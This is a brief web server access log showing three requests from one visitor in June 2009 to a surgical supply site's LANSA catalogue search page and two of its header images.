81.137.226.190 - - [04/Jun/2009:04:00:23 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS%20(S0040):0 HTTP/1.1" 200 69450 "http://www.acesurgical.com/allooss.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
81.137.226.190 - - [04/Jun/2009:04:00:24 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
81.137.226.190 - - [04/Jun/2009:04:00:24 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
